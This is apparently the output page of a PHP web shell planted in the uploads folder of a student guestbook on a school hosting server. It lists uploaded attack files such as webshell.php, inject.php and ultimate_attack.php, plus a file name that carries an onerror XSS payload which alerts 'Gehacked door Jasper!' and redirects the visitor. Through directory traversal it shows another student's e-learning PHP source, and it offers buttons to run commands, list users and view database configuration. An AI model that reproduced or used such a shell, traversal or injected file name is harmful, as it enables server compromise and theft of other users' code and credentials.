🐚 WEB SHELL ACTIVATED

πŸ“ File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

πŸ“„ ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
πŸ“ ..
πŸ“„ 003b15869ae62d2ceeee451a5f652dd6.png [view]
πŸ“„ 0tk5j14v024b1.jpg [view]
πŸ“„ 300px-Cursed_Cat.jpg [view]
πŸ“„ 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
πŸ“„ Bill-Gates-Paul-Allen-2013.jpg [view]
πŸ“„ CV Jasper Kramp.png [view]
πŸ“„ Cat profile.png [view]
πŸ“„ Fronalpstock_big.jpg [view]
πŸ“„ Krik en las.jpg [view]
πŸ“„ Krik.jpg [view]
πŸ“„ Pino-dood-03.jpg [view]
πŸ“„ Shellz.php [view]
πŸ“„ Ted_Kaczynski_2_(cropped).jpg [view]
πŸ“„ Tux.svg.png [view]
πŸ“„ Z.png [view]
πŸ“„ android.jpg [view]
πŸ“„ apple.php [view]
πŸ“„ cianancatfish.jpg [view]
πŸ“„ downloads (1).jpeg [view]
πŸ“„ downloads.jpeg [view]
πŸ“„ epresso.jpg [view]
πŸ“„ fake_photo.png [view]
πŸ“„ hand.jpg [view]
πŸ“„ https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
πŸ“„ image.png [view]
πŸ“„ images.jpeg [view]
πŸ“„ info.php [view]
πŸ“„ inject.php [view]
πŸ“„ instant_redirect.jpg [view]
πŸ“„ japper.jpg [view]
πŸ“„ koekiemonster-3.jpg [view]
πŸ“„ logo.png [view]
πŸ“„ muis.jpg [view]
πŸ“„ people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
πŸ“„ picobellobv.jpeg [view]
πŸ“„ redirect.php [view]
πŸ“„ rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
πŸ“„ sdfsa.png [view]
πŸ“„ sneaky.svg [view]
πŸ“„ taylor.webp [view]
πŸ“„ test.html [view]
πŸ“„ testpreg.php [view]
πŸ“„ testpreg1.php [view]
πŸ“„ testtest.php.JPG [view]
πŸ“„ ultimate_attack.gif [view]
πŸ“„ ultimate_attack.php [view]
πŸ“„ ultimate_attack.svg [view]
πŸ“„ wallpaper.jpg [view]
πŸ“„ webshell.php [view]

πŸ“„ Viewing: ./../../../../583521.klas4s23.mid-ica.nl/public_html/e-learing/editList.php

<?php

require 'database.php';

session_start();
if (!isset($_SESSION['user_id'])) {
    header("Location: login.php");
    exit;
}

if (isset($_GET['list_id'])) {
    $list_id = $_GET['list_id'];
    
  

    // Fetch the list data
    $stmt = $pdo->prepare("SELECT * FROM lists WHERE id = ?");
    $stmt->execute([$list_id]);
    $list = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($list) {
        // Decode questions and answers for display
        $questions = json_decode($list['questions']);
        $answers = json_decode($list['answers']);
    } else {
        echo "List not found.";
        exit;
    }
} else {
    echo "No list specified.";
    exit;
}

// Process form submission
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_GET['list_id'])) {
    $name = $_POST['name'];
    $mode = $_POST['mode'];
    $questions = json_encode($_POST['questions']);
    $answers = json_encode($_POST['answers']);

    // Update the list in the database
    $stmt = $pdo->prepare("UPDATE lists SET name = ?, mode = ?, questions = ?, answers = ? WHERE id = ?");
    $stmt->execute([$name, $mode, $questions, $answers, $list_id]);

    // Redirect back to the dashboard
    header("Location: dashboard.php");
    exit;
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Edit List</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="list-container">
    <h2>Bewerk Quiz</h2>
    <form action="editList.php?list_id=<?php echo $list_id; ?>" method="post">
        <label for="name">Quiz Naam:</label>
        <input type="text" id="name" name="name" value="<?php echo htmlspecialchars($list['name']); ?>">

        <label for="mode">Mode:</label>
        <select id="mode" name="mode">
            <option value="PrivΓ©" <?php if ($list['mode'] == 'PrivΓ©') echo 'selected'; ?>>PrivΓ©</option>
            <option value="Openbaar" <?php if ($list['mode'] == 'Openbaar') echo 'selected'; ?>>Openbaar</option>
        </select>

        <?php for ($i = 0; $i < 3; $i++): ?>
            <label for="question<?php echo $i; ?>">Vraag <?php echo ($i + 1); ?>:</label>
            <input type="text" id="question<?php echo $i; ?>" name="questions[]" value="<?php echo htmlspecialchars($questions[$i] ?? ''); ?>">

            <label for="answer<?php echo $i; ?>">Antwoord <?php echo ($i + 1); ?>:</label>
            <input type="text" id="answer<?php echo $i; ?>" name="answers[]" value="<?php echo htmlspecialchars($answers[$i] ?? ''); ?>">
        <?php endfor; ?>

        <button type="submit" name="save">Opslaan</button>
    </form>
    </div>
</body>
</html>

🎯 Available Actions

Command Execution:

Quick Commands:

πŸ“‹ List files | πŸ‘€ Show user | πŸ“ Show directory | πŸ”„ Show processes | πŸ” Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | πŸ” View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!